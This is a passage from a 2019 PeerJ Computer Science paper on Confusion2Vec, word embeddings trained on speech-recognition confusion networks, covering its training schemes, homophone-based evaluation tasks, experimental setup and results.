any semantic and syntactic relations associated with the language. The embedding obtained from this configuration can be fused (concatenated) with the traditional skip-gram word2vec embedding to form a new subspace representing both the independently trained subspaces. The number of training samples generated with this configuration is: #Samples ¼ Xn i¼1 Di � ðDi � 1Þ (1) where n is the number of time steps, Di is the number of confusions at the ith time step. Inter-confusion training—C2V-c In this configuration, we propose to model both the linguistic contexts and the word confusion contexts simultaneously. Figure 4 illustrates the training configuration. Each word in the current confusion is predicted from each word from the succeeding and preceding confusions over a predefined local context. To elaborate, the words wt-t′,i (context) are predicted from wt,j (current word) for i = 1,2,3 : : : length(C(t-t′)), j = 1,2,3 : : : length(C(t)), t′ ∈ 1,2,-1,-2 for skip-window of 2 for current confusion C(t)∀t as per Fig. 4. Since we assume the acoustic similarities for a word to be co-occurring, we expect to jointly model the co-occurrence of both the context and confusions. For clarity, since even the acoustic similarities are learned through context and not direct w t,1 w t,2 w t,3 w t-1,1 w t-1,2 w t-1,3 w t+1,1 w t+1,2 w t+1,3 w t+2,1 w t+2,2 w t+2,3 w t-2,1 w t-2,2 w t-2,3 C(t) C(t-2) C(t-1) C(t+1) C(t+2) Input Output Figure 4 Proposed inter-confusion training scheme for confusion networks. C(t) is a unit word confusion in the confusion network at a time- stamp t, that is, C(t) represents a set of arcs between two adjacent nodes of a confusion network, representing a set of confusable words. wt,i is the ith most probable word in the confusion C(t). Word confusions are sorted in decreasing order of their posterior probability: P(wt,1) > P(wt,2) > P(wt,3) : : : . Full-size DOI: 10.7717/peerj-cs.195/fig-4 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 10/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-4 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ acoustic mapping, as in the Intra-confusion case, we call the inter-confusion training C2V-context or C2V-c for short. This also has the additional benefit of generating more training samples than the intra- confusion training. The number of training samples generated is given by: #Samples ¼ Xn i¼1 XiþSw j¼i�Sw j6¼i Di � Dj (2) where n is the total number of time steps, Di is the number of word confusions at the i th time step, Sw is the skip-window size (i.e., sample Sw words from history and Sw words from the future context of current word). Inter-confusion training can be viewed as an extension of top-confusion training where the skip-gram modeling is applied to all possible paths through the confusion network. Hybrid intra-inter confusion training—C2V-� Finally, we merge both the intra-confusion and inter-confusion training. For clarity we call this model the C2V-� since it combines all the previous cases. This can be seen as a super-set of top-confusion, inter-confusion and intra-confusion training configurations. Figure 5 illustrates the training configuration. The words wt-t′,i (context) are predicted from wt,j (current word) for i = 1,2,3 : : : length(C(t-t′)), j = 1,2,3 : : : length (C(t)), t′ ∈ 1,2,0,-1,-2 such that if t′ = 0 then i s j; for skip-window of 2 for current confusion C(t)∀t as depicted in Fig. 5. We simply add the combination of training samples from the above two proposed techniques (i.e., the number of samples is the sum of Eqs. (1) and (2)). w t,1 w t,2 w t,3 w t-1,1 w t-1,2 w t-1,3 w t+1,1 w t+1,2 w t+1,3 w t+2,1 w t+2,2 w t+2,3 w t-2,1 w t-2,2 w t-2,3 C(t) C(t-2) C(t-1) C(t+1) C(t+2) Input Output w t,1 w t,2 w t,3 C(t) Figure 5 Proposed hybrid-confusion training scheme for confusion networks. C(t) is a unit word confusion in the confusion network at a time- stamp t, that is, C(t) represents a set of arcs between two adjacent nodes of a confusion network, representing a set of confusable words. wt,i is the ith most probable word in the confusion C(t). Word confusions are sorted in decreasing order of their posterior probability: P(wt,1) > P(wt,2) > P (wt,3) : : : . The dotted curved lines denote that the self-mapping is disallowed. Full-size DOI: 10.7717/peerj-cs.195/fig-5 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 11/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-5 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ TRAINING SCHEMES Model initialization/pre-training Very often, it has been found that better model initializations lead to better model convergence (Erhan et al., 2010). This is more significant in the case of under-represented words. Moreover, for training the word confusion mappings, it would benefit to build upon the contextual word embeddings, since our final goal is in conjunction with both contextual and confusion information. Hence, we experiment initializing all our models with the original Google’s word2vec model (https://code.google.com/archive/p/word2vec/) trained on Google News dataset with 100 billion words as described by Mikolov et al. (2013c). Pre-training rules are explained in the flowchart in Fig. 6A. For the words present in the Google’s word2vec vocabulary, we directly initialize the embeddings with word2vec. The embeddings for rest of the words are randomly initialized following uniform distribution. Model concatenation The hypothesis with model concatenation is that the two subspaces, one representing the contextual subspace (word2vec), and the other capturing the confusion subspace can be both trained independently and concatenated to give a new vector space which manifests both the information and hence a potentially useful vector word representation. Flowchart for model concatenation is shown in Fig. 6B. The model concatenation can be mathematically represented as: NEWn�e1þe2 ¼ W2Vn�e1 C2Vn�e2½ � (3) where NEW is the new concatenated vector space of dimensions n � e1 + e2, and n is the vocabulary size, e1 and e2 are the embedding sizes of W2V and C2V subspaces, respectively. Start W2V with pre-training (C2V-1) Intra/Inter/Hybrid C2V-(a/c/*) Concatenate Embeddings End Start Model Concatenation Joint Optimization Mode Fix Weights of Baseline Contextual Subspace Fine Tuning Intra/Inter/Hybrid C2V-(a/c/*) End Fixed Unrestricted Start Word Google Vocab Initialize from Google W2V Initialize Randomly End Yes No (a) Flowchart for pre-training/initializing models (b) Flowchart for concatenating models (c) Flowchart for joint optimization using unrestricted and Figure 6 Flowcharts for proposed training schemes. Full-size DOI: 10.7717/peerj-cs.195/fig-6 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 12/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-6 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Joint optimization Further to the model concatenation scheme, one could fine-tune the new vector space representation to better optimize to the task criterion (fine-tuning involves re-training end-to-end with a relatively lower learning rate than usual). This could be viewed as a case of relaxing the strict independence between two subspaces as in the case of model concatenation. The fine-tuning itself could be either of the aforementioned proposed techniques. We specifically try two configurations of joint optimization. i. Fixed contextual subspace In this configuration, we fix the contextual (word2vec) subspace and fine-tune only the confusion subspace. Since the word2vec already provides robust contextual representation, any fine-tuning on contextual space could possibly lead to sub-optimal state. Keeping the word2vec subspace fixed also allows the model to concentrate more specifically toward the confusion since the fixed subspace compensates for all the contextual mappings during training. This allows us to constrain the updatable parameters during joint optimization. It also allows for the possibility to directly use available word2vec models without modifications. The flowchart for the fixed contextual subspace joint optimization is displayed in Fig. 6C. ii. Unrestricted In this configuration, we optimize both the subspaces, that is, the contextual (word2vec) and the confusion subspaces. The hypothesis is the fine-tuning allows the two subspaces to interact to achieve the best possible representation. The flowchart for the unrestricted joint optimization is displayed in Fig. 6C. EVALUATION METHODS Prior literature suggests, there are two prominent ways for evaluating the vector space representation of words. One is based on semantic and syntactic analogy task as introduced by Mikolov et al. (2013a). The other common approach has been to assess the word similarities by computing the rank-correlation (Spearman’s correlation) on human annotated word similarity databases (Schnabel et al., 2015) like WordSim-353 (Finkelstein et al., 2001). Although the two evaluations can judge the vector representations of words efficiently for semantics and syntax of a language, we need to device an evaluation criteria for the word confusions, specifically for our case scenario—the acoustic confusions of words. For this, we formulate evaluations for acoustic confusions parallel to the analogy task and the word similarity task. Analogy tasks Semantic and syntactic analogy task Mikolov et al. (2013a) introduced an analogy task for evaluating the vector space representation of words. The task was based on the intuition that the words, say “king” is similar to “man” in the same sense as the “queen” is to “woman” and thus relies on answering questions relating to such analogies by performing algebraic operations on word representations. For example, the analogy is correct if the vector(“woman”) is most Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 13/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ similar to vector(“king”) - vector(“man”) + vector(“queen”). The analogy question test set is designed to test both syntactic and semantic word relationships. The test set contains five types of semantic questions (8,869 questions) and nine types of syntactic questions (10,675 questions). Finally, the efficiency of the vector representation is measured using the accuracy achieved on the analogy test set. We employ this for testing the semantic and syntactic (contextual axis as in terms of Fig. 1) relationship inherent in the vector space. Acoustic analogy task The primary purpose of the acoustic analogy task is to independently gauge the acoustic similarity information captured by the embedding model irrespective of the inherent semantic and syntactic linguistic information. Adopting a similar idea and extending the same for evaluation of word confusions, we formulate the acoustic confusion analogy task (vertical context test as in terms of Fig. 1) as follows. For similar sounding word pairs, “see” & “sea” and “red” & “read,” the word vector “see” is similar to “sea” in the same sense as the word “red” is to “read.” We set up an acoustic analogy question set on acoustically similar sounding words, more specifically homophones. Table 1 lists a few examples from our data set. A detailed description of the creation of dataset is presented in the section “Creation of evaluation datasets.” Semantic and syntactic–acoustic analogy task Further, rather than evaluating the semantic-syntactic tasks and the acoustic analogy tasks independently, we could test for both together. Intuitively, the word vectors in each of the two subspaces should interact together. We would expect for an analogy, “see”- “saw”:“take”-“took,” the word “see” has a homophone alternative in “sea,” thus there is a possibility of the word “see” being confused with “sea” in the new vector space. Thus an algebraic operation such as vector(“see”) - vector(“saw”) + vector(“take”) should be similar to vector(“took”) as before. Moreover, the vector(“sea”) - vector(“saw”) + vector (“take”) should also be similar to vector(“took”). This is because we expect the vector (“sea”) to be similar to vector(“see”) under the acoustic subspace. We also take into account the more challenging possibility of more than one homophone word substitution. For example, vector(“see”) - vector(“saw”) + vector(“allow”) is similar to vector(“allowed”), vector(“aloud”), and vector(“sea”) - vector(“saw”) + vector(“allow”). The hypothesis is that to come up with such a representation the system should jointly model both the language semantic-syntactic relations and the acoustic word similarity relations between words. The task is designed to test semantic–acoustic relations and the syntactic–acoustic relationships. In other words, in terms of Fig. 1, the task evaluates both the horizontal and vertical context together. A few examples of this task is listed in Table 2. In the section “Creation of evaluation datasets” details the creation of the database. Similarity ratings Word similarity ratings Along with the analogy task the word similarity task (Finkelstein et al., 2001) has been popular to evaluate the quality of word vector representations in the NLP community Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 14/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ (Pennington, Socher & Manning, 2014; Luong, Socher & Manning, 2013; Huang et al., 2012; Schnabel et al., 2015). In this work, we employ the WordSim-353 dataset (Finkelstein et al., 2001) for the word similarity task. The dataset has a set of 353 word pairs with a diverse range of human annotated scores relating to the similarity/dissimilarity of the two words. The rank-order correlation (Spearman correlation) between the human annotated scores and the cosine similarity of word vectors is computed. Higher correlation corresponds to better preservation of word similarity order represented by the word vectors, and hence better quality of the embedding vector space. Acoustic similarity ratings Employing a similar analogous idea to word similarity ratings and extending it to reflect the quality of word confusions, we formulate an acoustic word similarity task. The attempt is to have word pairs scored similar to as in WordSim-353 database, but with the scores reflecting the acoustic similarity. Table 3 lists a few randomly picked examples from our dataset. The dataset generation is described in the section “Creation of evaluation datasets”. DATA AND EXPERIMENTAL SETUP Database We employ Fisher English Training Part 1, Speech (LDC2004S13) and Fisher English Training Part 2, Speech (LDC2005S13) corpora (Cieri, Miller & Walker, 2004) for training the ASR. The corpora consists of approximately 1,915 h of telephone conversational speech data sampled at 8 kHz. A total of 11,972 speakers were involved in the recordings. The speech corpora is split into three speaker disjoint subsets for training, development and testing for ASR modeling purposes. A subset of the speech data containing approximately 1,905 h were segmented into 1,871,731 utterances to train the ASR. Both the development set and the test set consists of 5,000 utterances worth 5 h of speech data each. The transcripts contain approximately 20.8 million word tokens with 42,150 unique entries. Experimental setup Automatic speech recognition KALDI toolkit is employed for training the ASR (Povey et al., 2011). A hybrid DNN-HMM based acoustic model is trained on high resolution (40 dimensional) mel frequency cepstral coefficients along with i-vector features to provide speaker and channel information Table 1 Few examples from acoustic analogy task test-set. Word pair 1 Word pair 2 I’d Eyed Phi Fie Seedar Cedar Rued Rude Air Aire Spade Spayed Scent Cent Vile Vial Cirrus Cirrous Sold Soled Curser Cursor Pendant Pendent Sensor Censor Straight Strait Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 15/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ for robust modeling. The Carnegie Mellon University (CMU) pronunciation dictionary (Weide, 1998) is pruned to corpora’s vocabulary and is used as a lexicon for the ASR. A trigram language model is trained on the transcripts of the training subset data. The ASR system achieves a word error rates of 16.57% on the development and 18.12% on the test datasets. The decoded lattice is used to generate confusion network based on minimum Bayes risk criterion (Xu et al., 2011). The ASR output transcriptions resulted in a vocabulary size of 41,274 unique word tokens. Confusion2Vec For training the Confusion2Vec, the training subset of the Fisher corpora is used. The total number of tokens resulting from the multiple paths over the confusion network is approximately 69.5 million words, that is, an average of 3.34 alternative word confusions present for each word in the confusion network. A minimum frequency threshold of 5 is set to prune the rarely occurring tokens from the vocabulary, which resulted in the reduction of the vocabulary size from 41,274 to 32,848. Further, we also subsample the word tokens as suggested by Mikolov et al. (2013c) which was shown to be helpful. Both the frequency thresholding and the downsampling resulted in a reduction of word tokens from 69.5 million words to approximately 33.9 million words. The Confusion2Vec and Word2Vec are trained using the Tensorflow toolkit (Abadi et al., 2016). Negative Sampling objective is used for training as suggested for better efficiency (Mikolov et al., 2013c). For the skip-gram training, the batch-size of 256 was chosen and 64 negative samples were used for computing the Table 2 Few examples from Semantic&Syntactic—acoustic analogy task test set. Type of relationship Word pair 1 Word pair 2 Currency India Rupee Korea One (Won) Canada Dollar Denmark Krona (Krone) Japan Yen Sweden Krone (Krona) Family Buoy (Boy) Girl Brother Sister Boy Girl King Quean (Queen) Boy Girl Sun (Son) Daughter Adjective-to-adverb Calm Calmly Sloe (Slow) Slowly Opposite Aware Unaware Possible Impassible (Impossible) Comparative Bad Worse High Hire (Higher) Superlative Bad Worst Grate (Great) Greatest Present participle Dance Dancing Rite (Write) Writing Past tense Dancing Danced Flying Flu (Flew) Plural Banana Bananas Burred (Bird) Birds Plural verbs Decrease Decreases Fined (Find) Finds Multiple homophone substitutions Wright (Write) Writes Sea (See) Sees Rowed (Road) Roads I (Eye) Ayes (Eyes) Si (See) Seize (Sees) Right (Write) Writes Note: The words in the parenthesis are the original ones as in the analogy test set (Mikolov et al., 2013a) which have been replaced by their homophone alternatives. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 16/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ negative sampling loss. The skip-window was set to 4 and was trained for a total of 15 epochs. The parameters were chosen to provide optimal performance with traditional word2vec embeddings, evaluating for word analogy task, for the size of our database. During fine- tuning, the model was trained with a reduced learning rate and with other parameters unchanged. All the above parameters were fixed for consistent and fair comparison. Creation of evaluation datasets Acoustic analogy task We collected a list of homophones in English (http://homophonelist.com/homophones-list/ Accessed: 2018-04-30), and created all possible combinations of pairs of acoustic confusion analogies. For homophones with more than two words, we list all possible confusion pairs. Few examples from the dataset are listed in Table 1. We emphasize that the consideration of only homophones in the creation of the dataset is a strict and a difficult task to solve, since the ASR lattice contains more relaxed word confusions. Semantic and syntactic–acoustic analogy task We construct an analogy question test set by substituting the words in the original analogy question test set from Mikolov et al. (2013a) with their respective homophones. Considering all the five types of semantic questions and nine types of syntactic questions, for any words in the analogies with homophone alternatives, we swap with the homophone. We prune all the original analogy questions having no words with homophone alternatives. For analogies having more than one words with homophone alternatives, we list all permutations. We found that the number of questions generating by the above method, being exhaustive, was large and hence we randomly sample from the list to retain 948 semantic questions and 6,586 syntactic questions. Table 2 lists a few examples with single and multiple homophone substitutions for semantic and syntactic–acoustic analogy task from our data set. Acoustic similarity task To create a set of word pairs scored by their acoustic similarity, we add all the homophone word pairs with an acoustic similarity score of 1.0. To get a more diverse range of acoustic similarity scores, we also utilize all the 353 word pairs from the WordSim-353 dataset Table 3 Examples of acoustic similarity ratings. Word1 Word2 Acoustic rating WordSim353 I Eye 1.0 – Adolescence Adolescents 0.9 – Allusion Illusion 0.83 – Sewer Sower 0.66 – Fighting Defeating 0.57 7.41 Day Dawn 0.33 7.53 Weather Forecast 0.0 8.34 Notes: Acoustic rating: 1.0 = Identically sounding, 0.0 = Highly acoustically dissimilar. WordSim353: 10.0 = High word similarity, 0.0 = Low word similarity. Word pairs not present in WordSim353 is denoted by “–”. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 17/49 http://homophonelist.com/homophones-list/ http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ and compute the normalized phone edit distance using the CMU pronunciation dictionary (Weide, 1998). The normalized phone edit distance is of the range between 0 and 1. The edit distance of 1 refers to the word pair having almost 0 overlap between their respective phonetic transcriptions and thus being completely acoustically dissimilar and vice-versa. We use 1 – “phone_edit_distance” as the acoustic similarity score between the word pair. Thus a score of 1.0 signifies that the two words are identically sounding, whereas a score of 0 refers to words sounding drastically dissimilar. In the case of a word having more than one phonetic transcriptions (pronunciation alternatives), we use the minimum normalized edit distance. Table 3 shows a few randomly picked examples from the generated dataset. Finally, for evaluation, the respective corpora are pruned to match the in-domain training dataset vocabulary. Table 4 lists the samples in each evaluation dataset before and after pruning. Performance evaluation criterion In the original work by Mikolov et al. (2013a), the efficiency of the vector representation is measured using the accuracy achieved on the analogy test set. But, in our case, note that the semantic and syntactic analogy task and the semantic and syntactic–acoustic analogy task are mutually exclusive of each other. In other words, the model can get only one, either one, of the analogies correct, meaning any increments with one task will result in decrements over the other task. Moreover, while jointly modeling two orthogonal information streams (i) contextual co-occurrences, and (ii) acoustic word confusions, finding the nearest word vector nearest to the specific analogy is no longer an optimal evaluation strategy. This is because the word vector nearest to the analogy operation can either be along the contextual axis or the confusion axis, that is, each analogy could possibly have two correct answers. For example, the analogy “write”–“wrote”: “read” can be right when the nearest word vector is either “read” (contextual dimension) or “red” (confusion dimension). To incorporate this, we provide the accuracy over top-2 nearest vectors, that is, we count the analogy question as correct if any of the top-2 nearest vectors satisfies the analogy. This also holds for the acoustic confusion analogy tasks, especially for relations involving triplet homophones. For example, the analogy “write”-“right”: “road” can be right when the nearest word vector is either “rode” or “rowed” (for triplet homophones “road”/“rode”/“rowed”). Thus, we present evaluations by comparing the top-1 (nearest vector) evaluation with baseline word2vec against the top-2 evaluation for the proposed confusion2vec models. To maintain consistency, we also provide the top-2 evaluations for the baseline word2vec models in the appendix. Moreover, since we have three different analogy tasks, we provide the average accuracy among the three tasks in order to have an easy assessment of the performance of various proposed models. RESULTS Table 5 lists the results for various models. We provide evaluations on three different analogy tasks and two similarity tasks as discussed in the section “Evaluation Methods.” Further, more thorough results with the semantic and syntactic accuracy splits are provided under the appendix to gain deeper insights. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 18/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Baseline Word2Vec model We consider two variations of Word2Vec baseline model. First, we provide results with the Google’s Word2Vec model (https://code.google.com/archive/p/word2vec) which is trained with orders more training data, and is thus a high upper bound on the semantic and syntactic task. The Google’s Word2Vec model was pruned to match the vocabulary of our corpora to make the evaluation comparable. Second, we consider the Word2Vec model trained on the in-domain ground truth transcripts. The two baseline models result in good performance on Semantic&Syntactic analogy tasks and word similarity task as expected. The Google’s model achieves an accuracy of 61.42% on the Semantic&Syntactic analogy task. We note that the Syntactic accuracy (70.79%) is much higher than the Semantic accuracy (28.98%) (see Table A1). This could be due to our pruned evaluation test set (see Table 4). The in-domain model improves on the Semantic accuracy while losing on the syntactic accuracy over the Google model (see Table A1). The shortcomings of the in- domain model compared to the Google Word2Vec on the Semantic&Syntactic analogy task can be attributed toward the amount of training data and its extensive vocabulary. The in-domain model is trained on 20.8 million words vs. the 100 billion of Google’s News dataset. Moreover, the vocabulary size of in-domain models is approximately 42,150 vs. the three million of Google (Mikolov et al., 2013c) and thus unfair to compare with the rest of the models. Further, evaluating the Acoustic analogy and Semantic&Syntactic–Acoustic analogy tasks, all the baseline models perform poorly. An unusual thing we note is that the Google Word2Vec model performs better comparatively to the in-domain baseline model in the Semantic&Syntactic–Acoustic analogy task. A deeper examination revealed that the model compensates well for homophone substitutions on Semantic&Syntactic analogies which have very similar spellings. This suggests that the typographical errors present in the training data of the Google model results in a small peak in performance for the Semantic&Syntactic–Acoustic analogy task. On the evaluations of similarity tasks, all the baseline models perform well on the word similarity tasks as expected. However, they exhibit poor results on the acoustic similarity task. Overall, the results indicate that the baseline models are largely inept of capturing any relationships over the acoustic word confusions present in a confusion network or a lattice. In our specific case, the baseline models are poor in capturing relationships between acoustically similar words. Top-confusion—C2V-1 Comparing the top-confusion (C2V-1 for short), training scheme with the baseline in-domain word2vec model, we observe the baseline model trained on clean data Table 4 Statistics of evaluation datasets. Task Total samples Retained samples Semantic&Syntactic analogy 19,544 11,409 Acoustic analogy 20,000 2,678 Semantic&Syntactic–acoustic analogy 7,534 3,860 WordSim-353 353 330 Acoustic confusion ratings 1,372 943 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 19/49 https://code.google.com/archive/p/word2vec http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ performs better on the Semantic&Syntactic analogy task as expected. Baseline in-domain word2vec achieves 35.15% on the Semantic&Syntactic analogy task whereas the top-confusion model achieves 34.27% (see Table A1). However, the performance difference is minimal. This is encouraging because the top-confusion model is trained on the noisy ASR transcripts. Moreover, we see the noisy transcripts negatively affect the semantic accuracies while the syntactic accuracy remains identical which makes sense (see Table A1). Similar to the baseline in-domain word2vec model, the top-confusion model falls short to Google word2vec mainly due to the extensive amount of data employed in the latter case. Evaluating for Acoustic analogies and Semantic&Syntactic–Acoustic analogies, the top-confusion scheme improves slightly over the baseline word2vec model. This hints at the ability of the top-confusion model to capture some acoustic word confusions through context (e.g., “take a seat” is expected but sometimes we may see “take a sit”). The improvements are small because in a good quality ASR the top confusion network hypotheses contain few errors thus context learning is much stronger and acoustic- confusion learning is minimal. Note that the top-confusion model would converge to the baseline word2vec model in the case of a zero word error rate. Further, inspecting the performance in the similarity task, the top-confusion model exhibits statistically significant positive correlation in the word similarity task, although slightly smaller correlation than the baseline word2vec and Google word2vec model. However, we observe a positive (statistically significant) correlation on the acoustic similarity task, whereas both the baseline word2vec and Google word2vec model exhibit a negative correlation. This further validates the proposed top-confusion model’s capability to capture acoustic word confusions. Intra-confusion, C2V-a With intra-confusion training (C2V-acoustic or C2V-a for short) we expect the model to capture acoustically similar word relationships, while completely ignoring any Table 5 Results: different proposed models. Model Analogy tasks Similarity tasks S&S (%) Acoustic (%) S&S–acoustic (%) Average accuracy (%) Word similarity Acoustic similarity Google W2V 61.42 0.9 16.99 26.44 0.6893 -0.3489 In-domain W2V 35.15 0.3 7.86 14.44 0.5794 -0.2444 C2V-1 43.33 1.16 15.05 19.85 0.4992 0.1944 C2V-a 22.03 52.58 14.61 29.74 0.105* 0.8138 C2V-c 36.15 60.57 20.44 39.05 0.2937 0.8055 C2V-* 30.53 53.55 29.35 37.81 0.0963* 0.7858 Notes: C2V-1, top-confusion; C2V-a, intra-confusion; C2V-c, inter-confusion; C2V-*, hybrid intra-inter; S&S, Semantic & Syntactic analogy. All the models are of 256 dimensions except Google’s W2V which is 300 dimensions. For the analogy tasks: the accuracies of baseline word2vec models are for top-1 evaluations, whereas of the other models are for top-2 evaluations (as discussed in the section “Analogy Tasks”). Detailed semantic analogy and syntactic analogy accuracies, the top-1 evaluations and top-2 evaluations for all the models are available under Appendix in Table A1. For the similarity tasks: all the correlations (Spearman’s) are statistically significant with p < 0.001 except the ones with the asterisks. Detailed p- values for the correlations are presented under Appendix in Table A2. Bold entries correspond to the best results in their respective tasks. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 20/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ contextual relations. Hence, we expect the model to perform well on acoustic analogies and acoustic similarity tasks and to perform poorly on Semantic&Syntactic analogies and word similarity tasks. The Table 5 lists the results obtained using intra-confusion training. The results are in conjunction with our expectations. The model gives the worst results in Semantic&Syntactic analogy task. However, we observe that the syntactic analogy accuracy to be a fair amount higher than the semantic accuracy (see Table A1). We think this is mainly because of syntactically similar words appearing along the word confusion dimension in the confusion networks, resultant of the constraints enforced on the confusion network by the (ASR) language model—which are known to perform better for syntactic tasks (Mikolov et al., 2013a). The model also gives the highest correlation on the acoustic similarity task, while performing poorly on the word similarity task. Inter-confusion, C2V-c With inter-confusion training (C2V-contextual or C2V-c for short), we hypothesized that the model is capable of jointly modeling both the contextual information as well as confusions appearing contextually. Hence, we expect the model to perform well on both the Semantic&Syntactic analogy and Acoustic analogy tasks and in doing so result in better performance with Semantic&Syntactic–Acoustic analogy task. We also expect the model to give high correlations for both word similarity and acoustic similarity tasks. From Table 5, we observe that as hypothesized the inter-confusion training shows improvements in the Semantic&Syntactic analogy task. Quite surprisingly, the inter-confusion training shows better performance than the intra-confusion training for the Acoustic analogy task, hinting that having good contextual representation could mutually be beneficial for the confusion representation. However, we don’t observe any improvements in the Semantic&Syntactic–Acoustic analogy task. Evaluating on the similarity tasks, the results support the observations drawn from analogy tasks, that is, the model fares relatively well in both word similarity and acoustic similarity. Hybrid intra–inter confusion, C2V-� The hybrid intra–inter confusion training (C2V-� for short) introduces all confusability and allows learning directly confusable acoustic terms, such as in the C2V-a case, and contextual information that incorporates confusable terms, as in the Inter or C2V-c case. This model shows comparable performance in jointly modeling on both the Semantic&Syntactic and Acoustic analogy tasks. One crucial observation is that it gives significantly better performance with the Semantic&Syntactic–Acoustic analogy task. This suggests that jointly modeling both the intra-confusion and inter-confusion word mappings is useful. However, it achieves better results by compromising on the semantic analogy (see Table A1) accuracy and hence also negatively affecting the word similarity task. The model achieves good correlation on the acoustic similarity task. Overall, our proposed Confusion2Vec models capture significantly more useful information compared to the baseline models judging by the average accuracy over the analogy tasks. One particular observation we see across all the proposed models is that the performance remains fairly poor for the Semantic&Syntactic–Acoustic analogy task. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 21/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ This suggests that the Semantic&Syntactic–Acoustic analogy task is inherently hard to solve. We believe that to achieve better results with Semantic&Syntactic–Acoustic analogies, it is necessary to have a robust performance on one of the tasks (Semantic&Syntactic analogies or Acoustic analogies) to begin with, that is, better model initialization could help. Next, we experiment with model initializations/pre-training. Model initialization/pre-training Table 6 lists the results with model initialization/pre-training. The in-domain word2vec baseline model and the top-confusion models are initialized from the Google Word2Vec model. Pre-training the models provide improvements with Semantic&Syntactic analogy results to be close and comparable to that of the Google’s Word2Vec model. Empirically, we find the top-confusion model inherits approximately similar contextual information as the baseline models, and in addition outperforms the baseline in average accuracy. Thus, for future experiments we adopt the top-confusion model (rather than word2vec model) for initialization, model concatenation, and joint-training. The remaining models (C2V-a, C2V-c, and C2V-�) are initialized from the top-confusion model (i.e., C2V-1, the top-confusion model initialized from Google Word2Vec), since this would enable full compatibility with the vocabulary. Since the Google Word2Vec model is 300 dimensional, this forces all the pre- trained models (Table 6) to be 300, as opposed to 256 dimensions (Table 5). For intra-confusion model, the pre-training provides drastic improvements on Semantic&Syntactic analogy task at the expense of the Acoustic analogy task. Even-though the accuracy of Acoustic analogy task decreases comparatively to without pre-training, it remains significantly better than the baseline model. More importantly, the Semantic&Syntactic–Acoustic analogy task accuracy doubles. Inter-confusion model does not compromise on the Semantic&Syntactic analogy tasks, in doing so gives comparable performances to the baseline model. Additionally, it also does well on the Acoustic Table 6 Results with pre-training/initialization. Model Analogy tasks Similarity tasks S&S (%) Acoustic (%) S&S–acoustic (%) Average accuracy (%) Word similarity Acoustic similarity Google W2V 61.42 0.9 16.99 26.44 0.6893 -0.3489 In-domain W2V 59.17 0.6 8.15 22.64 0.4417 -0.4377 C2V-1 61.13 0.9 16.66 26.23 0.6036 -0.4327 C2V-a 63.97 16.92 43.34 41.41 0.5228 0.62 C2V-c 65.45 27.33 38.29 43.69 0.5798 0.5825 C2V-* 65.19 20.35 42.18 42.57 0.5341 0.6237 Notes: C2V-1, top-confusion; C2V-a, intra-confusion; C2V-c, inter-confusion; C2V-*, hybrid intra-inter; S&S, Semantic & Syntactic Analogy. All the models are of 300 dimensions. For the analogy tasks: the accuracies of baseline word2vec models are for top-1 evaluations, whereas of the other models are for top-2 evaluations (as discussed in the section “Analogy Tasks”). Detailed semantic analogy and syntactic analogy accuracies, the top-1 evaluations and top-2 evaluations for all the models are available under Appendix in Table A3. For the similarity tasks: all the correlations (Spearman’s) are statistically significant. Detailed p-values for the correlations are presented under Appendix in Table A4. Bold entries correspond to the best results in their respective tasks. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 22/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ and Semantic&Syntactic–Acoustic analogy task as was the case without pre-training. In the case of hybrid intra-inter confusion model, similar trends are observed as was with no pre-training, but with considerable improvements in accuracies. Pre-training also helps in boosting the correlations for the word similarity tasks for all the models. Overall, we find the pre-training to be extremely useful. Model concatenation Table 7 (rows 3-5) lists the results with model concatenation. We concatenate each of the proposed models (Table 5) with the pre-trained top-confusion model (we use C2V-1 model instead of word2vec as hypothesized in Fig. 6B because empirically C2V-1 model provided similar performance on Semantic&Syntactic tasks and overall better average accuracy on analogy tasks compared to the baseline-in-domain W2V model). Thus the resulting vector space is 556 dimensional (300 (pre-trained top-confusion model) + 256 (proposed models from Table 5)). In our case, we believe the dimension expansion of the vector space is insignificant in terms of performance considering the relatively low amount of training data compared to Google’s word2vec model. To be completely fair in judgment, we create a new baseline model with 556 dimensional embedding space for comparison. To train the new baseline model, the 556 dimension embedding was initialized with 300 dimensional Google’s word2vec embedding and the rest of the dimensions as zeros (null space). Comparing the 556 